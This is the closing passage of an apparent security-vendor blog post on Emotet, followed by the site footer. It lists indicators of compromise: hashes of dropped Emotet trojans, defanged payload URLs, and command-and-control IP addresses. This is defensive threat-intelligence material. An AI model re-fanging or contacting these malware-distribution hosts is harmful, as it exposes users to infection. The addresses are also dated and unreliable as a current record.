69caceab49fdcf349e2862d18ed39ed586d4e1a973f2ffda9904808871f6bce1 81F1052A4D972B33990ACD682B38182AC89AE812BD2C3A0E195BA0384AA53753 A62F9B138B9EF335233E2F25C1682A516632671334A969FDC15C32558CB6FD5C B9DCFF12869697646C0A62241CC211ED49D683324BA09663FCFD4EAD8F1C3807 C216A2A1E9F88F8889125D88D1875B1BB333D73A5F3DF9F63D238C5396594D06 D1A6784D0318BC92859A33AE5C4EA6F593DEB148DE4599D1DD14CFE807589E55 D97FD77F52628A1094C41E44E3781E81DA279039DE436CF313DBADE61FA1CD24 DC6C630936D718D02D1D3D8C71DA9847AB6FD9E79DC8695C5662793255F441B1 DDCCAD5FD03A3C620AABFFFE8B8464E8B2BEAF94954282D285E3850B0578DFA4 F4D9C1E45849B189548F2FCB45126B008CFA6254CFE2FABB789EC0F096672ECA F93B39B2723F9F0AC2DFE978FE284FA887CCF7C9BFB5FD9428C59025F56C5E86 DROPPED EMOTET TROJANS 2E63942BF12B6FBB3F8A48716E5D97079E4DF668C9181D9A66651CBA873D2A17 53B07540383F3D8AB47DC8966D2ABCDD5885F1D5D2D0E1D2E5046F90EABDE3F6 5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D 7ADDCF66ED2376C8F9B2ADAEFF04FC01C92881B2990D460EEFD60324209BD62C 890B9B288AA2C2183DA044232C2B750B83565741464E1938FD53444EB0929F18 928CC4AED8F8ABF2863F49142DCF4EE4BEE558E21161ED0296A32216EAA256D1 BFACADEFD24B4DC2ED4A1E928200C938A8608D24EDF651DB7A210972135FB149 E01516FEDFA82C82FB25F812AE106E4F4591B3191812B7FD93A0944731F335BA EE2699909F938CD5A35535FA372C36E88163D9C3971283ADAA6F7EF0CD8A2795 F020910684E6B806586131E30692FFE070442A0288D67FF85E6506B97B86B6AB FF27CB0A4046B7D4E23F007D65CDC52B06F41EE2DF99AB1133ED8A36862E4A21 URLS hxxp://63.143.67.107:20/ hxxp://78.189.21.131/ hxxp://81.150.17.158:8443/ hxxp://187.140.90.91:8080/ hxxp://198.61.196.18:8080/ hxxp://201.190.150.60:443/ hxxp://210.2.86.72:8080/ hxxp://213.120.119.231:8443/ hxxp://bod-karonconsulting.com/ZhsjepZP/ hxxp://www.countdown2chaos.com/RteZ6CxTl3/ hxxp://fortifi.com/IQmS1zuNj hxxp://www.ideenweberei.com/L9NXvhd/ hxxp://kliksys.com/yuZ6yAFq/ hxxp://limaxbatteries.com/yc8jyNd/ hxxp://strike3productions.com/fHXdHseo0/ hxxp://www.mtyfurnishing.com/uV0Z7WiM/ hxxp://www.omegaserbia.com/1rDAPTYEgE/ hxxp://www.wmdcustoms.com/SoYuALGOUR/ CONNECTED IPS 63.143.67.107 70.55.69.202 72.5.53.5 75.119.205.247 78.189.21.131 81.150.17.158 103.4.235.152 148.66.137.40 181.197.253.133 181.57.97.83 181.60.57.250 187.140.90.91 188.166.101.236 189.222.20.165 190.195.129.227 195.208.1.119 198.61.196.18 201.190.150.60 209.95.55.249 210.2.86.72 213.120.119.231 216.120.247.90 SHARE THIS: DISCOVER MORE RESOURCES A BRIEF HISTORY AND FURTHER TECHNICAL ANALYSIS OF SODINOKIBI RANSOMWARE TTPS AND MALWARE USED BY MUDDYWATER CYBER ESPIONAGE GROUP ZEPPELIN RANSOMWARE ANALYSIS, SIMULATION, AND MITIGATION SUBSCRIBE KEEP UP TO DATE WITH LATEST BLOG POSTS Notification Frequency * I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus. * By clicking the button below, you agree our Privacy Policy. United States 160 Spear Street, #1000 San Francisco, CA 94105 USA +1 (415) 890 5105 3001 North Rocky Point Drive East Suite 200 Tampa, FL 33607 USA +1 (336) 510 2907 United Kingdom Work.Life Soho, 9 Noel Street, London, W1F 8GQ, UK +44 20 38077425 Singapore 331 North Bridge Road, Odeon Towers, #22-05 188720 Singapore +65 3 1595424 Türkiye Hacettepe Teknokent, Üniversiteler Mah. 1596. Cad. 1. Ar-Ge 97/12 Beytepe, Çankaya/ Ankara, TR +90 (312) 235 3579 Email info@picussecurity.com Platform * The Complete Security Control Validation Platform * Security Control Validation for Prevention Controls * Security Control Validation for Detection Controls Integrations * Network Security Technologies * Security Incident and Event Management (SIEM) * Endpoint Detection and Response (EDR) * Security Orchestration, Automation and Response (SOAR) Use Cases * Security Posture Management * Security Control Validation * Security Control Rationalization * Enhancing Detection Efficacy * Compliance Enablement Resources * Reports & Guides * Webinars * Newsletter * MITRE ATT&CK * Purple Academy Partners * Technology Alliances * About the Partner Program * Become a Picus Partner Company * About Us * Careers * Contact * Customer Support Portal Follow us on LinkedIn Follow us on Twitter Follow us on Facebook © 2022 Copyright. All rights reserved. Terms | Privacy | Security